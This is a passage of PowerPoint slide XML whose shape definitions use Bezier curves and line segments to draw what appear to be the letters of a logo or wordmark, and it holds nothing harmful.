                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="11"/>
                      <a:pt x="3" y="13"/>
                      <a:pt x="4" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="15"/>
                      <a:pt x="6" y="16"/>
                      <a:pt x="7" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="10" y="18"/>
                      <a:pt x="12" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="18"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="17" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="16"/>
                      <a:pt x="19" y="14"/>
                      <a:pt x="19" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="10"/>
                      <a:pt x="13" y="10"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="10"/>
                      <a:pt x="21" y="10"/>
                      <a:pt x="21" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="20" y="16"/>
                      <a:pt x="19" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="19"/>
                      <a:pt x="15" y="20"/>
                      <a:pt x="12" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="20"/>
                      <a:pt x="5" y="19"/>
                      <a:pt x="3" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="2" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="6" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="14" y="0"/>
                      <a:pt x="16" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="1"/>
                      <a:pt x="19" y="2"/>
                      <a:pt x="2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17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5588000" y="1352550"/>
                <a:ext cx="22225" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 2 h 25"/>
                  <a:gd name="T6" fmla="*/ 2 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 25"/>
                  <a:gd name="T8" fmla="*/ 2 w 14"/>
                  <a:gd name="T9" fmla="*/ 10 h 25"/>
                  <a:gd name="T10" fmla="*/ 14 w 14"/>
                  <a:gd name="T11" fmla="*/ 10 h 25"/>
                  <a:gd name="T12" fmla="*/ 14 w 14"/>
                  <a:gd name="T13" fmla="*/ 12 h 25"/>
                  <a:gd name="T14" fmla="*/ 2 w 14"/>
                  <a:gd name="T15" fmla="*/ 12 h 25"/>
                  <a:gd name="T16" fmla="*/ 2 w 14"/>
                  <a:gd name="T17" fmla="*/ 23 h 25"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 23 h 25"/>
                  <a:gd name="T20" fmla="*/ 14 w 14"/>
                  <a:gd name="T21" fmla="*/ 25 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 14"/>
                  <a:gd name="T23" fmla="*/ 25 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 14"/>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5">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5629275" y="1352550"/>
                <a:ext cx="23813" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 12"/>
                  <a:gd name="T1" fmla="*/ 16 h 20"/>
                  <a:gd name="T2" fmla="*/ 2 w 12"/>
                  <a:gd name="T3" fmla="*/ 15 h 20"/>
                  <a:gd name="T4" fmla="*/ 6 w 12"/>
                  <a:gd name="T5" fmla="*/ 18 h 20"/>
                  <a:gd name="T6" fmla="*/ 8 w 12"/>
                  <a:gd name="T7" fmla="*/ 18 h 20"/>
                  <a:gd name="T8" fmla="*/ 9 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 20"/>
                  <a:gd name="T10" fmla="*/ 10 w 12"/>
                  <a:gd name="T11" fmla="*/ 15 h 20"/>
                  <a:gd name="T12" fmla="*/ 9 w 12"/>
                  <a:gd name="T13" fmla="*/ 13 h 20"/>
                  <a:gd name="T14" fmla="*/ 6 w 12"/>
                  <a:gd name="T15" fmla="*/ 10 h 20"/>
                  <a:gd name="T16" fmla="*/ 3 w 12"/>
                  <a:gd name="T17" fmla="*/ 7 h 20"/>
                  <a:gd name="T18" fmla="*/ 1 w 12"/>
                  <a:gd name="T19" fmla="*/ 4 h 20"/>
                  <a:gd name="T20" fmla="*/ 2 w 12"/>
                  <a:gd name="T21" fmla="*/ 2 h 20"/>
                  <a:gd name="T22" fmla="*/ 4 w 12"/>
                  <a:gd name="T23" fmla="*/ 0 h 20"/>
                  <a:gd name="T24" fmla="*/ 6 w 12"/>
                  <a:gd name="T25" fmla="*/ 0 h 20"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 0 h 20"/>
                  <a:gd name="T28" fmla="*/ 11 w 12"/>
                  <a:gd name="T29" fmla="*/ 3 h 20"/>
                  <a:gd name="T30" fmla="*/ 10 w 12"/>
                  <a:gd name="T31" fmla="*/ 4 h 20"/>
                  <a:gd name="T32" fmla="*/ 8 w 12"/>
                  <a:gd name="T33" fmla="*/ 2 h 20"/>
                  <a:gd name="T34" fmla="*/ 6 w 12"/>
                  <a:gd name="T35" fmla="*/ 2 h 20"/>
                  <a:gd name="T36" fmla="*/ 4 w 12"/>
                  <a:gd name="T37" fmla="*/ 2 h 20"/>
                  <a:gd name="T38" fmla="*/ 4 w 12"/>
                  <a:gd name="T39" fmla="*/ 4 h 20"/>
                  <a:gd name="T40" fmla="*/ 4 w 12"/>
                  <a:gd name="T41" fmla="*/ 5 h 20"/>
                  <a:gd name="T42" fmla="*/ 5 w 12"/>
                  <a:gd name="T43" fmla="*/ 7 h 20"/>
                  <a:gd name="T44" fmla="*/ 7 w 12"/>
                  <a:gd name="T45" fmla="*/ 9 h 20"/>
                  <a:gd name="T46" fmla="*/ 11 w 12"/>
                  <a:gd name="T47" fmla="*/ 12 h 20"/>
                  <a:gd name="T48" fmla="*/ 12 w 12"/>
                  <a:gd name="T49" fmla="*/ 15 h 20"/>
                  <a:gd name="T50" fmla="*/ 10 w 12"/>
                  <a:gd name="T51" fmla="*/ 19 h 20"/>
                  <a:gd name="T52" fmla="*/ 6 w 12"/>
                  <a:gd name="T53" fmla="*/ 20 h 20"/>
                  <a:gd name="T54" fmla="*/ 3 w 12"/>
                  <a:gd name="T55" fmla="*/ 19 h 20"/>
                  <a:gd name="T56" fmla="*/ 0 w 12"/>
                  <a:gd name="T5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 h="20">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                      <a:pt x="2" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="17"/>
                      <a:pt x="4" y="18"/>
                      <a:pt x="6" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="18"/>
                      <a:pt x="7" y="18"/>
                      <a:pt x="8" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="9" y="17"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="16"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="10" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="14"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="12"/>
                      <a:pt x="7" y="11"/>
                      <a:pt x="6" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="9"/>
                      <a:pt x="3" y="8"/>
                      <a:pt x="3" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="6"/>
                      <a:pt x="1" y="5"/>
                      <a:pt x="1" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="2" y="3"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="1"/>
                      <a:pt x="10" y="2"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                      <a:pt x="10" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="3"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="8" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="2"/>
                      <a:pt x="7" y="2"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="2"/>
                      <a:pt x="5" y="2"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="3"/>
                      <a:pt x="4" y="3"/>
                      <a:pt x="4" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="6"/>
                      <a:pt x="4" y="6"/>
                      <a:pt x="5" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="7"/>
                      <a:pt x="6" y="8"/>
                      <a:pt x="7" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="10"/>
                      <a:pt x="10" y="11"/>
                      <a:pt x="11" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="12" y="14"/>
                      <a:pt x="12" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="16"/>
                      <a:pt x="11" y="18"/>
                      <a:pt x="10" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="20"/>
                      <a:pt x="8" y="20"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="20"/>
                      <a:pt x="4" y="20"/>
                      <a:pt x="3" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="19"/>
                      <a:pt x="1" y="18"/>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19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5661025" y="1352550"/>
                <a:ext cx="23813" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 25"/>
                  <a:gd name="T6" fmla="*/ 3 w 15"/>
                  <a:gd name="T7" fmla="*/ 2 h 25"/>
                  <a:gd name="T8" fmla="*/ 3 w 15"/>
                  <a:gd name="T9" fmla="*/ 10 h 25"/>
                  <a:gd name="T10" fmla="*/ 15 w 15"/>
                  <a:gd name="T11" fmla="*/ 10 h 25"/>
                  <a:gd name="T12" fmla="*/ 15 w 15"/>
                  <a:gd name="T13" fmla="*/ 12 h 25"/>
                  <a:gd name="T14" fmla="*/ 3 w 15"/>
                  <a:gd name="T15" fmla="*/ 12 h 25"/>
                  <a:gd name="T16" fmla="*/ 3 w 15"/>
                  <a:gd name="T17" fmla="*/ 23 h 25"/>
                  <a:gd name="T18" fmla="*/ 15 w 15"/>
                  <a:gd name="T19" fmla="*/ 23 h 25"/>
                  <a:gd name="T20" fmla="*/ 15 w 15"/>
                  <a:gd name="T21" fmla="*/ 25 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 15"/>
                  <a:gd name="T23" fmla="*/ 25 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 1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5">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2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20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5688013" y="1352550"/>
                <a:ext cx="20638" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 13"/>
                  <a:gd name="T1" fmla="*/ 2 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 13"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 13 w 13"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 13 w 13"/>
                  <a:gd name="T7" fmla="*/ 2 h 25"/>
                  <a:gd name="T8" fmla="*/ 8 w 13"/>
                  <a:gd name="T9" fmla="*/ 2 h 25"/>
                  <a:gd name="T10" fmla="*/ 8 w 13"/>
                  <a:gd name="T11" fmla="*/ 25 h 25"/>
                  <a:gd name="T12" fmla="*/ 5 w 13"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 5 w 13"/>
                  <a:gd name="T15" fmla="*/ 2 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 13"/>
                  <a:gd name="T17"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5">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5"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21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5710238" y="1352550"/>
                <a:ext cx="22225" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 2 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 14 w 14"/>
                  <a:gd name="T7" fmla="*/ 2 h 25"/>
                  <a:gd name="T8" fmla="*/ 9 w 14"/>
                  <a:gd name="T9" fmla="*/ 2 h 25"/>
                  <a:gd name="T10" fmla="*/ 9 w 14"/>
                  <a:gd name="T11" fmla="*/ 25 h 25"/>
                  <a:gd name="T12" fmla="*/ 7 w 14"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 7 w 14"/>
                  <a:gd name="T15" fmla="*/ 2 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17"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5">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7"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22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5737225" y="1352550"/>
                <a:ext cx="476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3"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5751513" y="1352550"/>
                <a:ext cx="30163" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 19"/>
                  <a:gd name="T1" fmla="*/ 25 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 19"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 19"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 17 w 19"/>
                  <a:gd name="T7" fmla="*/ 19 h 25"/>
                  <a:gd name="T8" fmla="*/ 17 w 19"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 19 w 19"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 19 w 19"/>
                  <a:gd name="T13" fmla="*/ 25 h 25"/>
                  <a:gd name="T14" fmla="*/ 19 w 19"/>
                  <a:gd name="T15" fmla="*/ 25 h 25"/>
                  <a:gd name="T16" fmla="*/ 3 w 19"/>
                  <a:gd name="T17" fmla="*/ 6 h 25"/>
                  <a:gd name="T18" fmla="*/ 3 w 19"/>
                  <a:gd name="T19" fmla="*/ 25 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 19"/>
                  <a:gd name="T2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5">
                    <a:moveTo>
                      <a:pt x="0" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:ln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24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5791200" y="1352550"/>
                <a:ext cx="42863" cy="39688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 21"/>
                  <a:gd name="T1" fmla="*/ 3 h 20"/>
                  <a:gd name="T2" fmla="*/ 18 w 21"/>
                  <a:gd name="T3" fmla="*/ 5 h 20"/>
                  <a:gd name="T4" fmla="*/ 15 w 21"/>
                  <a:gd name="T5" fmla="*/ 2 h 20"/>
                  <a:gd name="T6" fmla="*/ 11 w 21"/>
                  <a:gd name="T7" fmla="*/ 2 h 20"/>
                  <a:gd name="T8" fmla="*/ 7 w 21"/>
                  <a:gd name="T9" fmla="*/ 3 h 20"/>
                  <a:gd name="T10" fmla="*/ 3 w 21"/>
                  <a:gd name="T11" fmla="*/ 6 h 20"/>
                  <a:gd name="T12" fmla="*/ 2 w 21"/>
                  <a:gd name="T13" fmla="*/ 10 h 20"/>
                  <a:gd name="T14" fmla="*/ 3 w 21"/>
                  <a:gd name="T15" fmla="*/ 14 h 20"/>
                  <a:gd name="T16" fmla="*/ 7 w 21"/>
                  <a:gd name="T17" fmla="*/ 17 h 20"/>
                  <a:gd name="T18" fmla="*/ 11 w 21"/>
                  <a:gd name="T19" fmla="*/ 18 h 20"/>
                  <a:gd name="T20" fmla="*/ 16 w 21"/>
                  <a:gd name="T21" fmla="*/ 17 h 20"/>
                  <a:gd name="T22" fmla="*/ 19 w 21"/>
                  <a:gd name="T23" fmla="*/ 12 h 20"/>
                  <a:gd name="T24" fmla="*/ 13 w 21"/>
                  <a:gd name="T25" fmla="*/ 12 h 20"/>
                  <a:gd name="T26" fmla="*/ 13 w 21"/>
                  <a:gd name="T27" fmla="*/ 10 h 20"/>
                  <a:gd name="T28" fmla="*/ 21 w 21"/>
                  <a:gd name="T29" fmla="*/ 10 h 20"/>
                  <a:gd name="T30" fmla="*/ 18 w 21"/>
                  <a:gd name="T31" fmla="*/ 18 h 20"/>
                  <a:gd name="T32" fmla="*/ 11 w 21"/>
                  <a:gd name="T33" fmla="*/ 20 h 20"/>
                  <a:gd name="T34" fmla="*/ 3 w 21"/>
                  <a:gd name="T35" fmla="*/ 17 h 20"/>
                  <a:gd name="T36" fmla="*/ 0 w 21"/>
                  <a:gd name="T37" fmla="*/ 10 h 20"/>
                  <a:gd name="T38" fmla="*/ 2 w 21"/>
                  <a:gd name="T39" fmla="*/ 5 h 20"/>
                  <a:gd name="T40" fmla="*/ 5 w 21"/>
                  <a:gd name="T41" fmla="*/ 1 h 20"/>
                  <a:gd name="T42" fmla="*/ 11 w 21"/>
                  <a:gd name="T43" fmla="*/ 0 h 20"/>
                  <a:gd name="T44" fmla="*/ 16 w 21"/>
                  <a:gd name="T45" fmla="*/ 1 h 20"/>
                  <a:gd name="T46" fmla="*/ 20 w 21"/>
                  <a:gd name="T4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 h="20">
                    <a:moveTo>
                      <a:pt x="20" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="5"/>
                      <a:pt x="18" y="5"/>
                      <a:pt x="18" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="4"/>
                      <a:pt x="16" y="3"/>
                      <a:pt x="15" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="2"/>
                      <a:pt x="12" y="2"/>
                      <a:pt x="11" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="2"/>
                      <a:pt x="8" y="2"/>
                      <a:pt x="7" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="3"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="3" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="7"/>
                      <a:pt x="2" y="8"/>
                      <a:pt x="2" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="11"/>
                      <a:pt x="3" y="13"/>
                      <a:pt x="3" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="15"/>
                      <a:pt x="5" y="16"/>
                      <a:pt x="7" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="18"/>
                      <a:pt x="10" y="18"/>
                      <a:pt x="11" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="18"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="16" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="16"/>
                      <a:pt x="19" y="14"/>
                      <a:pt x="19" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="10"/>
                      <a:pt x="13" y="10"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="10"/>
                      <a:pt x="21" y="10"/>
                      <a:pt x="21" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="20" y="16"/>
                      <a:pt x="18" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="19"/>
                      <a:pt x="14" y="20"/>
                      <a:pt x="11" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="20"/>
                      <a:pt x="5" y="19"/>
                      <a:pt x="3" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="15"/>
                      <a:pt x="0" y="12"/>
                      <a:pt x="0" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="2" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="3"/>
                      <a:pt x="4" y="2"/>
                      <a:pt x="5" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="14" y="0"/>
